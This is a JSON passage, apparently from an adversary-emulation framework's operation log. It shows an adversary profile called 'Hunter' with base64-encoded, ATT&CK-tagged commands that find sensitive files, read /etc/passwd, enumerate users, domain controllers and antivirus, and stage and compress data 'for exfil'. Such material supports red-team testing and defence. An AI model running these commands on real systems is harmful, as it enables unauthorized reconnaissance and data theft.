\"SYSVOL\",\r \"Path\": \"C:\\\\Windows\\\\SYSVOL\\\\sysvol\",\r \"Scoped\": false,\r \"ScopeName\": \"*\",\r \"SecurityDescriptor\": \"O:BAG:SYD:(A;;0x1200a9;;;WD)(A;;FA;;;BA)(A;;FA;;;AU)\",\r \"ShadowCopy\": false,\r \"Special\": false,\r \"Temporary\": false,\r \"Volume\": \"\\\\\\\\?\\\\Volume{c10d87a2-0000-0000-0000-100000000000}\\\\\",\r \"PSComputerName\": null\r }\r]\r"
},
{
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"command": "Q29tcHJlc3MtQXJjaGl2ZSAtUGF0aCBDOlxVc2Vyc1xBZG1pbmlzdHJhdG9yXHN0YWdlZCAtRGVzdGluYXRpb25QYXRoIEM6XFVzZXJzXEFkbWluaXN0cmF0b3Jcc3RhZ2VkLnppcCAtRm9yY2U7c2xlZXAgMTsgbHMgQzpcVXNlcnNcQWRtaW5pc3RyYXRvclxzdGFnZWQuemlwIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgc2VsZWN0",
"delegated": "2020-03-22 00:26:39",
"run": "2020-03-22 00:26:47",
"status": 1,
"platform": "windows",
"executor": "psh",
"pid": 6868,
"description": "Compress a directory on the file system",
"name": "Compress staged directory",
"attack": {
"tactic": "exfiltration",
"technique_name": "Data Compressed",
"technique_id": "T1002"
},
"output": "ls : Cannot find path 'C:\\Users\\Administrator\\staged.zip' because it does not exist.\rAt line:1 char:121\r+ ... aged.zip -Force;sleep 1; ls C:\\Users\\Administrator\\staged.zip | forea ...\r+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r + CategoryInfo : ObjectNotFound: (C:\\Users\\Administrator\\staged.zip:String) [Get-ChildItem], ItemNotFound \r Exception\r + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\r \r"
}
]
}
},
"finish": null,
"planner": "sequential",
"adversary": {
"adversary_id": "de07f52d-9928-4071-9142-cb1d3bd851e8",
"name": "Hunter",
"description": "Discover host details and steal sensitive files",
"phases": {
"1": [
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bdarwinsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "ZmluZCAvVXNlcnMgLW5hbWUgJyouI3tmaWxlLnNlbnNpdGl2ZS5leHRlbnNpb259JyAtdHlwZSBmIC1ub3QgLXBhdGggJyovXC4qJyAtc2l6ZSAtNTAwayAyPi9kZXYvbnVsbCB8IGhlYWQgLTU=",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "sh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bdarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufSAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "psh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspwsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufSAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "pwsh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspwsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81blinuxsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "ZmluZCAvIC1uYW1lICcqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufScgLXR5cGUgZiAtbm90IC1wYXRoICcqL1wuKicgLXNpemUgLTUwMGsgMj4vZGV2L251bGwgfCBoZWFkIC01",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "sh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81blinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c0da588f-79f0-4263-8998-7496b1a40596darwinsh",
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033",
"name": "Identify active user",
"test": "d2hvYW1p",
"description": "Find user running agent",
"cleanup": [],
"executor": "sh",
"unique": "c0da588f-79f0-4263-8998-7496b1a40596darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c0da588f-79f0-4263-8998-7496b1a40596linuxsh",
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033",
"name": "Identify active user",
"test": "d2hvYW1p",
"description": "Find user running agent",
"cleanup": [],
"executor": "sh",
"unique": "c0da588f-79f0-4263-8998-7496b1a40596linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c0da588f-79f0-4263-8998-7496b1a40596windowspsh",
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033",
"name": "Identify active user",
"test": "JGVudjp1c2VybmFtZQ==",
"description": "Find user running agent",
"cleanup": [],
"executor": "psh",
"unique": "c0da588f-79f0-4263-8998-7496b1a40596windowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c0da588f-79f0-4263-8998-7496b1a40596windowscmd",
"ability_id": "c0da588f-79f0-4263-8998-7496b1a40596",
"tactic": "discovery",
"technique_name": "System Owner/User Discovery",
"technique_id": "T1033",
"name": "Identify active user",
"test": "ZWNobyAldXNlcm5hbWUl",
"description": "Find user running agent",
"cleanup": [],
"executor": "cmd",
"unique": "c0da588f-79f0-4263-8998-7496b1a40596windowscmd",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48darwinsh",
"ability_id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48",
"tactic": "discovery",
"technique_name": "Account Discovery",
"technique_id": "T1087",
"name": "Find local users",
"test": "Y3V0IC1kOiAtZjEgL2V0Yy9wYXNzd2QgfCBncmVwIC12ICdfJyB8IGdyZXAgLXYgJyMn",
"description": "Get a list of all local users",
"cleanup": [],
"executor": "sh",
"unique": "c1cd6388-3ced-48c7-a511-0434c6ba8f48darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48linuxsh",
"ability_id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48",
"tactic": "discovery",
"technique_name": "Account Discovery",
"technique_id": "T1087",
"name": "Find local users",
"test": "Y3V0IC1kOiAtZjEgL2V0Yy9wYXNzd2QgfCBncmVwIC12ICdfJyB8IGdyZXAgLXYgJyMn",
"description": "Get a list of all local users",
"cleanup": [],
"executor": "sh",
"unique": "c1cd6388-3ced-48c7-a511-0434c6ba8f48linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "feaced8f-f43f-452a-9500-a5219488abb8darwinsh",
"ability_id": "feaced8f-f43f-452a-9500-a5219488abb8",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Identify local users",
"test": "ZHNjbCAuIGxpc3QgL1VzZXJzIHwgZ3JlcCAtdiAnXyc=",
"description": "Identify all local users",
"cleanup": [],
"executor": "sh",
"unique": "feaced8f-f43f-452a-9500-a5219488abb8darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "feaced8f-f43f-452a-9500-a5219488abb8windowspsh",
"ability_id": "feaced8f-f43f-452a-9500-a5219488abb8",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Identify local users",
"test": "R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfVXNlckFjY291bnQ=",
"description": "Identify all local users",
"cleanup": [],
"executor": "psh",
"unique": "feaced8f-f43f-452a-9500-a5219488abb8windowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "6469befa-748a-4b9c-a96d-f191fde47d89darwinsh",
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Create staging directory",
"test": "bWtkaXIgLXAgc3RhZ2VkICYmIGVjaG8gJFBXRC9zdGFnZWQ=",
"description": "create a directory for exfil staging",
"cleanup": [
"cm0gLXJmIHN0YWdlZA=="
],
"executor": "sh",
"unique": "6469befa-748a-4b9c-a96d-f191fde47d89darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "6469befa-748a-4b9c-a96d-f191fde47d89linuxsh",
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Create staging directory",
"test": "bWtkaXIgLXAgc3RhZ2VkICYmIGVjaG8gJFBXRC9zdGFnZWQ=",
"description": "create a directory for exfil staging",
"cleanup": [
"cm0gLXJmIHN0YWdlZA=="
],
"executor": "sh",
"unique": "6469befa-748a-4b9c-a96d-f191fde47d89linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "6469befa-748a-4b9c-a96d-f191fde47d89windowspsh",
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Create staging directory",
"test": "TmV3LUl0ZW0gLVBhdGggIi4iIC1OYW1lICJzdGFnZWQiIC1JdGVtVHlwZSAiZGlyZWN0b3J5IiAtRm9yY2UgfCBmb3JlYWNoIHskXy5GdWxsTmFtZX0gfCBTZWxlY3QtT2JqZWN0",
"description": "create a directory for exfil staging",
"cleanup": [
"UmVtb3ZlLUl0ZW0gLVBhdGggInN0YWdlZCIgLXJlY3Vyc2U="
],
"executor": "psh",
"unique": "6469befa-748a-4b9c-a96d-f191fde47d89windowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "6469befa-748a-4b9c-a96d-f191fde47d89windowspwsh",
"ability_id": "6469befa-748a-4b9c-a96d-f191fde47d89",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Create staging directory",
"test": "TmV3LUl0ZW0gLVBhdGggIi4iIC1OYW1lICJzdGFnZWQiIC1JdGVtVHlwZSAiZGlyZWN0b3J5IiAtRm9yY2UgfCBmb3JlYWNoIHskXy5GdWxsTmFtZX0gfCBTZWxlY3QtT2JqZWN0",
"description": "create a directory for exfil staging",
"cleanup": [
"UmVtb3ZlLUl0ZW0gLVBhdGggInN0YWdlZCIgLXJlY3Vyc2U="
],
"executor": "pwsh",
"unique": "6469befa-748a-4b9c-a96d-f191fde47d89windowspwsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bdarwinsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "ZmluZCAvVXNlcnMgLW5hbWUgJyouI3tmaWxlLnNlbnNpdGl2ZS5leHRlbnNpb259JyAtdHlwZSBmIC1ub3QgLXBhdGggJyovXC4qJyAtc2l6ZSAtNTAwayAyPi9kZXYvbnVsbCB8IGhlYWQgLTU=",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "sh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bdarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufSAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "psh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspwsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufSAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGludWUnIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgU2VsZWN0LU9iamVjdCAtZmlyc3QgNTtleGl0IDA7",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "pwsh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81bwindowspwsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "90c2efaa-8205-480d-8bb6-61d90dbaf81blinuxsh",
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005",
"name": "Find files",
"test": "ZmluZCAvIC1uYW1lICcqLiN7ZmlsZS5zZW5zaXRpdmUuZXh0ZW5zaW9ufScgLXR5cGUgZiAtbm90IC1wYXRoICcqL1wuKicgLXNpemUgLTUwMGsgMj4vZGV2L251bGwgfCBoZWFkIC01",
"description": "Locate files deemed sensitive",
"cleanup": [],
"executor": "sh",
"unique": "90c2efaa-8205-480d-8bb6-61d90dbaf81blinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
}
],
"2": [
{
"id": "b6f545ef-f802-4537-b59d-2cb19831c8eddarwinsh",
"ability_id": "b6f545ef-f802-4537-b59d-2cb19831c8ed",
"tactic": "discovery",
"technique_name": "System Network Configuration Discovery",
"technique_id": "T1016",
"name": "Snag broadcast IP",
"test": "aWZjb25maWcgfCBncmVwIGJyb2FkY2FzdA==",
"description": "Capture the local network broadcast IP address",
"cleanup": [],
"executor": "sh",
"unique": "b6f545ef-f802-4537-b59d-2cb19831c8eddarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5adarwinsh",
"ability_id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a",
"tactic": "discovery",
"technique_name": "Process Discovery",
"technique_id": "T1057",
"name": "Find user processes",
"test": "cHMgYXV4IHwgZ3JlcCAje2hvc3QudXNlci5uYW1lfQ==",
"description": "Get process info for processes running as a user",
"cleanup": [],
"executor": "sh",
"unique": "3b5db901-2cb8-4df7-8043-c4628a6a5d5adarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5alinuxsh",
"ability_id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a",
"tactic": "discovery",
"technique_name": "Process Discovery",
"technique_id": "T1057",
"name": "Find user processes",
"test": "cHMgYXV4IHwgZ3JlcCAje2hvc3QudXNlci5uYW1lfQ==",
"description": "Get process info for processes running as a user",
"cleanup": [],
"executor": "sh",
"unique": "3b5db901-2cb8-4df7-8043-c4628a6a5d5alinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5awindowspsh",
"ability_id": "3b5db901-2cb8-4df7-8043-c4628a6a5d5a",
"tactic": "discovery",
"technique_name": "Process Discovery",
"technique_id": "T1057",
"name": "Find user processes",
"test": "JG93bmVycyA9IEB7fTtnd21pIHdpbjMyX3Byb2Nlc3MgfCUgeyRvd25lcnNbJF8uaGFuZGxlXSA9ICRfLmdldG93bmVyKCkudXNlcn07JHBzID0gZ2V0LXByb2Nlc3MgfCBzZWxlY3QgcHJvY2Vzc25hbWUsSWQsQHtsPSJPd25lciI7ZT17JG93bmVyc1skXy5pZC50b3N0cmluZygpXX19O2ZvcmVhY2goJHAgaW4gJHBzKSB7ICAgIGlmKCRwLk93bmVyIC1lcSAiI3tob3N0LnVzZXIubmFtZX0iKSB7ICAgICAgICAkcDsgICAgfX0=",
"description": "Get process info for processes running as a user",
"cleanup": [],
"executor": "psh",
"unique": "3b5db901-2cb8-4df7-8043-c4628a6a5d5awindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.user.name",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "530e47c6-8592-42bf-91df-c59ffbd8541bwindowspwsh",
"ability_id": "530e47c6-8592-42bf-91df-c59ffbd8541b",
"tactic": "discovery",
"technique_name": "Network Share Discovery",
"technique_id": "T1135",
"name": "View admin shares",
"test": "R2V0LVNtYlNoYXJlIHwgQ29udmVydFRvLUpzb24=",
"description": "Network Share Discovery",
"cleanup": [],
"executor": "pwsh",
"unique": "530e47c6-8592-42bf-91df-c59ffbd8541bwindowspwsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.json",
"relationships": [
{
"source": "domain.smb.share",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "530e47c6-8592-42bf-91df-c59ffbd8541bwindowspsh",
"ability_id": "530e47c6-8592-42bf-91df-c59ffbd8541b",
"tactic": "discovery",
"technique_name": "Network Share Discovery",
"technique_id": "T1135",
"name": "View admin shares",
"test": "R2V0LVNtYlNoYXJlIHwgQ29udmVydFRvLUpzb24=",
"description": "Network Share Discovery",
"cleanup": [],
"executor": "psh",
"unique": "530e47c6-8592-42bf-91df-c59ffbd8541bwindowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.json",
"relationships": [
{
"source": "domain.smb.share",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "b22b3b47-6219-4504-a2e6-ae8263e49fc3windowspsh",
"ability_id": "b22b3b47-6219-4504-a2e6-ae8263e49fc3",
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018",
"name": "Find domain controller",
"test": "bmx0ZXN0IC9kY2xpc3Q6JVVTRVJET01BSU4l",
"description": "Identify remote domain controller",
"cleanup": [],
"executor": "psh",
"unique": "b22b3b47-6219-4504-a2e6-ae8263e49fc3windowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "2dece965-37a0-4f70-a391-0f30e3331abadarwinsh",
"ability_id": "2dece965-37a0-4f70-a391-0f30e3331aba",
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063",
"name": "Discover antivirus programs",
"test": "ZmluZCAvQXBwbGljYXRpb25zLyAtbWF4ZGVwdGggMiAtaW5hbWUgKi5hcHAgfCBncmVwIC1pbyAiW2EteiBdKlwuYXBwIiB8IGdyZXAgLUVpIC0tICJzeW1hbnRlY3xub3J0b258Yml0ZGVmZW5kZXJ8a2FwZXJza3l8ZXNldHxhdmFzdHxhdmlyYXxtYWx3YXJlYnl0ZXN8c29waG9zfCh0cmVuZCBtaWNybyki",
"description": "Identify AV",
"cleanup": [],
"executor": "sh",
"unique": "2dece965-37a0-4f70-a391-0f30e3331abadarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.antivirus",
"relationships": [
{
"source": "host.installed.av",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "2dece965-37a0-4f70-a391-0f30e3331abawindowspsh",
"ability_id": "2dece965-37a0-4f70-a391-0f30e3331aba",
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063",
"name": "Discover antivirus programs",
"test": "d21pYyAvTkFNRVNQQUNFOlxccm9vdFxTZWN1cml0eUNlbnRlcjIgUEFUSCBBbnRpVmlydXNQcm9kdWN0IEdFVCAvdmFsdWU=",
"description": "Identify AV",
"cleanup": [],
"executor": "psh",
"unique": "2dece965-37a0-4f70-a391-0f30e3331abawindowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.installed.av",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2windowspsh",
"ability_id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Permission Groups Discovery",
"test": "Z3ByZXN1bHQgL1I=",
"description": "Summary of permission and security groups",
"cleanup": [],
"executor": "psh",
"unique": "5c4dd985-89e3-4590-9b57-71fed66ff4e2windowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2darwinsh",
"ability_id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Permission Groups Discovery",
"test": "Z3JvdXBz",
"description": "Summary of permission and security groups",
"cleanup": [],
"executor": "sh",
"unique": "5c4dd985-89e3-4590-9b57-71fed66ff4e2darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2linuxsh",
"ability_id": "5c4dd985-89e3-4590-9b57-71fed66ff4e2",
"tactic": "discovery",
"technique_name": "Permission Groups Discovery",
"technique_id": "T1069",
"name": "Permission Groups Discovery",
"test": "Z3JvdXBz",
"description": "Summary of permission and security groups",
"cleanup": [],
"executor": "sh",
"unique": "5c4dd985-89e3-4590-9b57-71fed66ff4e2linuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777windowspsh",
"ability_id": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777",
"tactic": "discovery",
"technique_name": "Security Software Discovery",
"technique_id": "T1063",
"name": "Identify Firewalls",
"test": "JE5hbWVTcGFjZSA9IEdldC1XbWlPYmplY3QgLU5hbWVzcGFjZSAicm9vdCIgLUNsYXNzICJfX05hbWVzcGFjZSIgfCBTZWxlY3QgTmFtZSB8IE91dC1TdHJpbmcgLVN0cmVhbSB8IFNlbGVjdC1TdHJpbmcgIlNlY3VyaXR5Q2VudGVyIjskU2VjdXJpdHlDZW50ZXIgPSAkTmFtZVNwYWNlIHwgU2VsZWN0LU9iamVjdCAtRmlyc3QgMTtHZXQtV21pT2JqZWN0IC1OYW1lc3BhY2UgInJvb3RcJFNlY3VyaXR5Q2VudGVyIiAtQ2xhc3MgQW50aVZpcnVzUHJvZHVjdCB8IFNlbGVjdCBEaXNwbGF5TmFtZSwgSW5zdGFuY2VHdWlkLCBQYXRoVG9TaWduZWRQcm9kdWN0RXhlLCBQYXRoVG9TaWduZWRSZXBvcnRpbmdFeGUsIFByb2R1Y3RTdGF0ZSwgVGltZXN0YW1wIHwgRm9ybWF0LUxpc3Q7",
"description": "Identify Firewalls",
"cleanup": [],
"executor": "psh",
"unique": "8c06ebf8-bacf-486b-bd77-21ba8c5a5777windowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ce485320-41a4-42e8-a510-f5a8fe96a644linuxsh",
"ability_id": "ce485320-41a4-42e8-a510-f5a8fe96a644",
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018",
"name": "Discover Mail Server",
"test": "aG9zdCAiI3t0YXJnZXQub3JnLmRvbWFpbn0iIHwgZ3JlcCBtYWlsIHwgZ3JlcCAtb0UgJ1teIF0rJCcgfCByZXYgfCBjdXQgLWMgMi0gfCByZXY=",
"description": "Identify the organizations mail server",
"cleanup": [],
"executor": "sh",
"unique": "ce485320-41a4-42e8-a510-f5a8fe96a644linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "target.org.emailhost",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
